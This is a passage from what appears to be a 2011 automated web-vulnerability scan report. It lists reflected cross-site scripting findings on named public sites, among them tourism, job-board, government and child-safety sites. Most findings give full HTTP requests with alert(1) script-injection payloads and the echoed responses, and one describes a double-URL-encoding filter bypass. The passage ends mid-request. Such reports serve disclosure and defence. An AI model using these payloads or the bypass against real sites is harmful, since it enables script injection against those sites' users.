<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/floridalive94549"-alert(1)-"cff8ca947d0";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.165. http://www.visitflorida.com/floridalive [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a84"-alert(1)-"67d3bce7207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /floridalive?f6a84"-alert(1)-"67d3bce7207=1 HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:04:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=5jdbskaopdg012apacf6dqm5h6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 465693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/floridalive?f6a84"-alert(1)-"67d3bce7207=1";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(saja
...[SNIP]...

3.166. http://www.visitflorida.com/images/webcam.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /images/webcam.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7be23"-alert(1)-"209a4580ba0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images7be23"-alert(1)-"209a4580ba0/webcam.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
quest_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/images7be23"-alert(1)-"209a4580ba0/webcam.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + es
...[SNIP]...

3.167. http://www.visitflorida.com/images/webcam.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /images/webcam.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7032f"-alert(1)-"b913a62d629 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/webcam.php7032f"-alert(1)-"b913a62d629 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
+ "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/images/webcam.php7032f"-alert(1)-"b913a62d629";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.168. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3720"-alert(1)-"4ed0587ae69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includesd3720"-alert(1)-"4ed0587ae69/js/footerSurvey.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
est_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/includesd3720"-alert(1)-"4ed0587ae69/js/footerSurvey.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&r
...[SNIP]...

3.169. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48bbc"-alert(1)-"a5c8345a95b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/js48bbc"-alert(1)-"a5c8345a95b/footerSurvey.php HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
_type + "/" + sajax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/includes/js48bbc"-alert(1)-"a5c8345a95b/footerSurvey.php";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=
...[SNIP]...

3.170. http://www.visitflorida.com/includes/js/footerSurvey.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /includes/js/footerSurvey.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e396"-alert(1)-"fea77290035 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/js/footerSurvey.php8e396"-alert(1)-"fea77290035 HTTP/1.1
Host: www.visitflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=ucr8rgmvej8vuckb1d2o3lktc1;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
ax_target_id);
           target_id = sajax_target_id;
           if (typeof(sajax_request_type) == "undefined" || sajax_request_type == "")
               sajax_request_type = "GET";
           
           uri = "/includes/js/footerSurvey.php8e396"-alert(1)-"fea77290035";
           if (sajax_request_type == "GET") {
           
               if (uri.indexOf("?") == -1)
                   uri += "?rs=" + escape(func_name);
               else
                   uri += "&rs=" + escape(func_name);
               uri += "&rst=" + escape(sajax_
...[SNIP]...

3.171. http://www.workoneworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workoneworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 513f2"><script>alert(1)</script>6c36e2d12eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?513f2"><script>alert(1)</script>6c36e2d12eb=1 HTTP/1.1
Host: www.workoneworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 580


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>WorkOne: MAKE YOUR MOVE </title>
<META name="description" content="WorkO
...[SNIP]...
<frame src="http://www.in.gov/dwd/WorkOne//?513f2"><script>alert(1)</script>6c36e2d12eb=1" frameborder="0" />
...[SNIP]...

3.172. http://www.workoneworks.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workoneworks.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8bb8"><script>alert(1)</script>27c9e25d6ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c8bb8"><script>alert(1)</script>27c9e25d6ef=1 HTTP/1.1
Host: www.workoneworks.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 591


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>WorkOne: MAKE YOUR MOVE </title>
<META name="description" content="WorkO
...[SNIP]...
<frame src="http://www.in.gov/dwd/WorkOne//favicon.ico?c8bb8"><script>alert(1)</script>27c9e25d6ef=1" frameborder="0" />
...[SNIP]...

3.173. https://secure.missingkids.com/missingkids/servlet/CybertipServlet [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.missingkids.com
Path:   /missingkids/servlet/CybertipServlet

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3091"><script>alert(1)</script>2d2ab01185f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /missingkids/servlet/CybertipServlet HTTP/1.1
Host: secure.missingkids.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d3091"><script>alert(1)</script>2d2ab01185f

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 30 Apr 2011 12:28:49 GMT
Content-type: text/html;charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>National Center for Missing & Exploited Children</title>


<!-- MK
...[SNIP]...
<INPUT TYPE="hidden" NAME="referrer" VALUE="http://www.google.com/search?hl=en&q=d3091"><script>alert(1)</script>2d2ab01185f">
...[SNIP]...

3.174. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2747e%2522%253balert%25281%2529%252f%252fa146450da24 was submitted in the Referer HTTP header. This input was echoed as 2747e";alert(1)//a146450da24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2747e%2522%253balert%25281%2529%252f%252fa146450da24

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96589

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=2747e%2522%253balert%25281%2529%252f%252fa146450da24";addthis_title="2747e";alert(1)//a146450da24 - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

3.175. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 37b00<script>alert(1)</script>d23ffaf1246 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=37b00<script>alert(1)</script>d23ffaf1246

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96613

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>d23ffaf1246";addthis_title="37b00<script>alert(1)</script>d23ffaf1246 - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

3.176. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85189"><script>alert(1)</script>7030b33bcdc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=85189"><script>alert(1)</script>7030b33bcdc

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96631

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=85189"><script>alert(1)</script>7030b33bcdc" />
...[SNIP]...

3.177. http://www.nist.gov/cgi-bin/exit_nist.cgi [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nist.gov
Path:   /cgi-bin/exit_nist.cgi

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 37ba9--><script>alert(1)</script>c42eb69629a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/exit_nist.cgi HTTP/1.1
Host: www.nist.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304125248634_871119"}; CFTOKEN=89200427; fsr.a=1304125245932; CFID=17042989;
Referer: http://www.google.com/search?hl=en&q=37ba9--><script>alert(1)</script>c42eb69629a

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: Apache
NIST: g3
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 535

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=37ba9--><script>alert(1)</script>c42eb69629a-->
...[SNIP]...

3.178. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f223f"><a>4f2eeafb0f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f223f"><a>4f2eeafb0f7
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:57 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:57'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<form action="http://www.google.com/search?hl=en&q=f223f"><a>4f2eeafb0f7&amp;securitysys=on&amp;FormID=480&amp;rand=838597" method="post" style="margin:0px;padding:0px;" name="Form0">
...[SNIP]...

3.179. http://image.providesupport.com/js/hic/safe-standard.js [vsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a17"-alert(1)-"5b90fbcef04 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201820966&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com
